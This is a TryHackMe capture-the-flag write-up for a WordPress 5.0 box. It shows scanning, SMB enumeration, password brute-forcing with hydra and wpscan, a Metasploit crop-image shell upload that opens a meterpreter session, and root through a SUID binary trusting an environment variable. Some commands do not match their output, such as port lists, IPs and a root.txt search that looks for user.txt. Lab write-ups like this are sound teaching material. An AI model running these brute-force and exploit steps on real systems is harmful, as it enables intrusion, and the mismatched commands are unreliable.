Post

Blog - Medium THM

Posted Updated
By TFA 2 min read
  • OS: Linux
  • Difficulty: Medium
  • Author: Talace

Scanning

Threader3000.py

1
2
3
4

Port 22 is open
Port 139 is open
Port 80 is open
Port 445 is open

Nmap scan

1
2
3
4
5
6
7
8
9
10
11

nmap -p21,80 -sV -sC -T4 -Pn -oA 10.10.10.5 10.10.10.5

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
|_http-title: Billy Joel's IT Blog – The IT blog
|_/wp-admin/
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open              Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

SMB Enumeration with enum4linux & smbclient

1
2
3
4
5
6
7

enum4linux 10.10.15.175 -A

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
BillySMB        Disk      Billy's local SMB Share
IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))

Now that we’ve found some shared folder, let’s dig in it.

1
2
3
4
5

smbclient --no-pass //10.10.15.175/BillySMB

  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020

Found nothing interesting, let’s go on the wordpress

Exploit

Brute force login page w/ hydra & wpscan

wpscan brute force attack login

1

wpscan --url http://blog.thm/ --passwords /usr/share/wordlists/rockyou.txt

(another way with hydra) Hydra brute force attack login

1

hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"

now let’s search for an exploit in metasploit

1
2
3
4
5

search WordPress 5.0.0

#  Name                            Disclosure Date  Rank       Check  Description
-  ----                            ---------------  ----       -----  -----------
0  exploit/multi/http/wp_crop_rce  2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload

Perfect! Let’s try it!

1
2
3
4
5
6

set LHOST 10.8.138.226
set RHOSTS 10.10.15.175
set USERNAME kwheel
set PASSWORD *********

run

Nice we get our meterpreter session!

Privilege escalation

Suid file

Found the file

1
2
3

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null\

-rwsr-sr-x 1 root root 8432 May 26  2020 /usr/sbin/checker

Ltrace it to see what’s done in there

1
2
3
4
5

ltrace /usr/sbin/checker

getenv("admin")                                  = "1"
setuid(0)                                        = 0
system("/bin/bash")

Since we only need admin to be true and present in the env, let’s export the value

1

export admin=1

And run it again!

1

/usr/sbin/checker

Got root! Now let’s find user.txt and root.txt, since we now the creator of this box is a player

1
2
3
4

find / -type f -name "user.txt"

/home/bjoel/user.txt
/media/usb/user.txt

And root.txt!

1
2
3
4

find / -type f -name "user.txt"


/root/root.txt
writeup, TryHackMe
Web CMS
This post is licensed under CC BY 4.0 by the author.